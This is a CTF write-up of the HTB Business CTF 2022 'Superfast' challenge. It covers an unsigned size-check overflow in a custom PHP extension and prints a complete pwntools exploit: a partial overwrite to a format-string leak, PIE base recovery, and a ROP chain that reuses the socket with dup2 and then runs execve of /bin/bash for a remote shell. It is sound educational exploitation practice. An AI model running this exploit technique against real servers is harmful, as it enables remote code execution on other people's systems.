[HTB-Business22] Superfast Writeup | Fascinating Confusion

Wed 20 July 2022
ctf
Galile0
pwn exploit writeup format-string rop php partial overwrite

Superfast was an "easy" exploit challenge during the HTB Business CTF 2022. While rated easy I found it to be rather tricky. The challenge was based on a custom shared library loaded into php and exposed through a webserver.

Challenge setup

We were give a Docker file, which was later fixed to pin the PHP version to a specific commit, the compiled lib and also the source code as well as a build environment of the library and index.php . Let's look at the library source:

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

__attribute__((force_align_arg_pointer))
void print_message(char* p) {
    php_printf(p);
}

I've shortened the source for readibility. So basically the library suppports a new log_cmd function which takes some input, XORs it with a user defined value, and writes it to /tmp/log . Let's see how it is called from the index.php :

<?php
//echo $_SERVER['HTTP_CMD_KEY'];
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
    $key = intval($_SERVER['HTTP_CMD_KEY']);
    //echo $key;
    if ($key <= 0 || $key > 255) {
        http_response_code(400);
    } else {
        log_cmd($_GET['cmd'], $key);
    }
} else {
    http_response_code(400);
}

Pretty straight forward. We can supply our cmd as a get parameter and our key as a header parameter.

A subtle bug

Now the issue here is pretty subtle and hard to spot in the source code. Of course we know memcpy is dangerous. So naturally we try to send a large string, and get a segfault. But wait? Shouldn't if (sizeof(buffer) - size > 0) { ensure that our input isn't larger than the 64 byte buffer? Technically yes, but that's a really unfortunate check as size_t is an unsigned type. So the compiler sees a substraction of two unsigned values, which of course can never get negative. So the only way this substraction won't result in a value larger than 0 is if both are of equal size. And in fact we can verify this in the disassembly:

It would've worked if the values were typecasted before as this code shows:

#include <stdio.h>

int main()
{
    size_t target_size = 10;
    size_t input_size = 100;
    int result = target_size - input_size;
    printf("%d\n", result);
    if((target_size - input_size) > 0) {
        printf("Input < Target");
    } else {
        printf("Input > Target");
    }
}

Running this results in:

1 2	-90 Input < Target

Alright, so we can overflow the buffer. Now what?

Setting up the exploit

First, let's get some basic scripting going to interact with the binary.

#!/usr/bin/env python3
from pwn import *
from urllib.parse import quote_plus
import time

# Exploit configs
php = ELF('./php', checksec=False)
host = '127.0.0.1'
port = 1337
context.binary = php.path

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE or args.REMOTE:
        return
    info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(SO_ADR+b))
    gdb.attach(php_io, gdbscript='\n'.join(cmds))
    time.sleep(2) # wait for debugger startup

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach

    if not args.REMOTE:
        php_io = process(['./php', '-dextension=./php_logger.so', '-S', '0.0.0.0:1337'])
        php_io.recvuntil('started')

    def send(key, cmd):
        io = remote(host, port)
        payload = ''.join([chr(c^key) for c in cmd[0:64]]).encode()
        payload += cmd[64:]
        req = (
            f'GET /?cmd={quote_plus(payload)} HTTP/1.1\r\n'
            f'Content-Type:application/json\r\n'
            f'CMD_KEY: {str(key)}\r\n\r\n'
            )
        io.send(req.encode())
        return io

    print(send(1, b'AAAABBBB').recvall(timeout=None))

You may wonder why I don't use an http library like requests and instead build the whole HTTP request myself to pipe it through a raw socket. This will become clear later. Also note that the send method integrates the "encrypt" for the first 64 bytes to make sure we don't get xored garbage on the stack.

Back to exploitation. While we can overwrite the return address of the decrypt function and even way beyond that, we don't have anything to overwrite it with. This is where partial overwrites come into play. While we don't know any addresses we can still overwrite the last few bytes. This allows us to at least change the exeuction flow within the original binary. Since we want to get some leak, the printf function seems to be a good idea. While jumping directly to the printf linked in the got crashes the binary, we can jump to the call inside of the zif_log_cmd function at 0x1440 . Let's check in GDB what our return address overwrite looks like. To do so we add the following to our exploit script:

1 2	launch_gdb(cmds=[' b decrypt+523', 'c']) send(1, b'A'0x98+b'BBBB')

Launching this gives a the following result in gdb:

$rax   : 0x007f5cd245f240  →  0x0000001600000001
$rbx   : 0x005626d4a20b80  →  0x0000000000000000
$rcx   : 0x4000
$rdx   : 0x007f5cd245f240  →  0x0000001600000001
$rsp   : 0x007ffcf914f0d8  →  0x00007f5c42424242
$rbp   : 0x2
$rsi   : 0x007ffcf914f048  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rdi   : 0x007f5cd245f260  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rip   : 0x007f5cd5e033bc  →  <decrypt+523> ret
$r8    : 0x007f5cd245f2d5  →  0xfcf914f040000000
$r9    : 0x007f5cd539e517  →  <__memcpy_ssse3+3895> movaps xmm2, XMMWORD PTR [rsi-0x18]
$r10   : 0x007f5cd5e025d5  →  "_emalloc"
$r11   : 0x007f5cd5402060  →  0xfff9d1d0fff9d008
$r12   : 0x007f5cd2414170  →  0x0000000000000000
$r13   : 0x0
$r14   : 0x007f5cd2414020  →  0x007f5cd248b820  →  0x005626d3b90068  →  <execute_ex+8120> mov r12, QWORD PTR [r14+0x8]
$r15   : 0x007f5cd248b820  →  0x005626d3b90068  →  <execute_ex+8120> mov r12, QWORD PTR [r14+0x8]
──────────────────────────────────────────────────────────────────────────────────── stack ────
0x007ffcf914f0d8│+0x0000: 0x00007f5c42424242         ← $rsp
0x007ffcf914f0e0│+0x0008: 0x007ffcf914f160  →  0x0000000000000000
0x007ffcf914f0e8│+0x0010: 0x007f5cd2414170  →  0x0000000000000000
0x007ffcf914f0f0│+0x0018: 0x005626d4a20b80  →  0x0000000000000000
0x007ffcf914f0f8│+0x0020: 0x0000000000000001
0x007ffcf914f100│+0x0028: 0x000000000000009c
0x007ffcf914f108│+0x0030: 0x007f5cd245f0d8  →  "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[...]"
0x007ffcf914f110│+0x0038: 0x0000000000000002
────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7f5cd5e033af <decrypt+510>    mov    rax, QWORD PTR [rsp+0x60]
0x7f5cd5e033b4 <decrypt+515>    nop
0x7f5cd5e033b5 <decrypt+516>    add    rsp, 0xb8
→ 0x7f5cd5e033bc <decrypt+523>    ret

This is super nice since we see our ret is overwritten with 4 B's and rdi still points to our input. This means we should get an easy format string!

Getting some leaks

So let's try our format string and use the following payload:

p = b'%p ' * 25
p += b'A' * (0x98 - len(p))
p += b'\x40'
print(send(1, p).recvall(timeout=None))

As you can see it's enough to overwrite the very last byte of the return address as the return already goes into the right address space. Doing so, we get the following leaks:

0x7fffe92a0688 0x7f0c87c5a300 0x4000 0x7f0c87c5a395 0x7f0c8ab06517 0x564967220b80 0x7f0c87c5a320 0x2 0x7f0c8b56b445 0x7fffe92a07a0 0x7f0c87c14170 0x564967220b80 0x1 0x99 0x7f0c87c5a0d8 0x2 0x11ca5664fbeed00 0x2

Mapping this to the memory map of our process we can see an address of the php_logger.so and an adress of php itself as well as a stack address. But unlucky for us no libc leak.

At this point I was stuck for quite a while as I tried to make use of the usual %10$p format string modifier to read/write other values. But for some reason, php or zend or whatever doesn't support this modifier and so we are stuck with whatever values we can reach naturally. But we can calculate the base addresses of both the library and php itself. This means we probably need to to a classic ropchain. Looking at the gadgets of the logger library shows us nothing of use really, so let's try to get a ropchain in php going. First, let's parse the leaks:

p = b'%p ' * 25
p += b'A' * (0x98 - len(p)) # padding
p += b'\x40'

leaks = send(1, p).recvall(timeout=None).split()
php.address = int(leaks[22], 16) -  0x1420b80
success(f"PHP @ {php.address:012x}")

Neat! Now we have to think about what kind of ropchain we can even build and use.

Exploitation fails

At this point I was stuck again for what felt like forever. Because how do we exploit this? We could call execve(/bin/sh) as one does in these cases. But of course we have no access to stdin or stdout so the server will just hang and that's it. What I tried was writing a php shell to the webdirectory leveraging the fopen and fgets already linked in the php_logger.so, and while it worked locally, it didn't on the remote. As I found out after the ctf, the user had no write permission in the web folder. [Insert sad hacker noises].

And that's where I was stuck and also why we didn't solve this challenge until after the ctf. After some sleep and talking to friends and colleagues, the solution was quite obvious: We can just call dup to duplicate stdin and stdout to the file descriptor of the socket which has to be opened by php to pipe the response into. And after that we can indeed just call execve(/bin/sh) and interact with the binary as usual. And that's also the reason why I didn't start off using requests or urllib as they will not allow us to interact with the socket and just hang waiting for a server response.

PHP Ropchain

Now that we know what we have to do it's actually quite easy. I build my ropchain manually using ropper and copying adresses around. But after the CTF someone in Discord showed me that pwntools offers a super nice (and supringsingly well working) wrapper for that. And since my writeups are supposed to be teaching new stuff, why not use that. So I rewrote my ropchain using this fancy pwntools module:

r = ROP(php)
r.call('dup2', [4, 0])
r.call('dup2', [4, 1])
r.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/bash\x00"))
r.execve(binsh, 0, 0)

p = b'A'*0x98 # padding
p += r.chain()
send(1, p).interactive()

For this to work you have to load the correct binary as an ELF object (in this case I did so at the start of the script). And that's id. Now we can start our remote instance, copy IP and Port into the header and call ./exploit.py REMOTE (In this case running against the local docker instance provided by the challenge):

❯ ./writeup.py REMOTE
[*] '/media/sf_vmexchange/ctfyo/pwn_superfast/challenge/php'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    Packer:   Packed with UPX
[+] Opening connection to 127.0.0.1 on port 1337: Done
[+] Receiving all data: Done (354B)
[*] Closed connection to 127.0.0.1 port 1337
[+] PHP @ 55b935400000
[*] Loaded 322 cached gadgets for './php'
[*] Using sigreturn for 'SYS_execve'
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
core
flag.txt
index.php
php_logger.so
start.sh
$ cat flag.txt
HTB{rophp1ng_4r0und_th3_st4ck!}
$ 👍

Too bad we didn't solve this one during the CTF, but to be fair: Even in hindsight I wouldn't have rated this one as easy. But well, you never stop learning!

Complete pwnscript

# Exploit configs
php = ELF('./php', checksec=False)
host = '127.0.0.1'
port = 1337
context.binary = php.path # Import for ROP() to work

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE or args.REMOTE:
        return
    info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(SO_ADR+b))
    gdb.attach(php_io, gdbscript='\n'.join(cmds))
    time.sleep(2) # wait for debugger startup

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to skip local process creation and disable launch_gdb()

    if not args.REMOTE:
        php_io = process(['./php', '-dextension=./php_logger.so', '-S', '0.0.0.0:1337'])
        php_io.recvuntil('started') # Wait for local server to spawn

    def send(key, cmd):
        io = remote(host, port)
        payload = ''.join([chr(c^key) for c in cmd[0:64]]).encode()
        payload += cmd[64:]
        req = (
            f'GET /?cmd={quote_plus(payload)} HTTP/1.1\r\n'
            f'Content-Type:application/json\r\n'
            f'CMD_KEY: {str(key)}\r\n\r\n'
            )
        io.send(req.encode())
        return io

    p = b'%p ' * 25
    p += b'A' * (0x98 - len(p)) # padding
    p += b'\x40'

    leaks = send(1, p).recvall(timeout=None).split()
    php.address = int(leaks[22], 16) -  0x1420b80
    success(f"PHP @ {php.address:012x}")

    r = ROP(php)
    r.call('dup2', [4, 0])
    r.call('dup2', [4, 1])
    r.call('dup2', [4, 2])
    binsh = next(php.search(b"/bin/bash\x00"))
    r.execve(binsh, 0, 0)

    p = b'A'*0x98 # padding
    p += r.chain()
    send(1, p).interactive()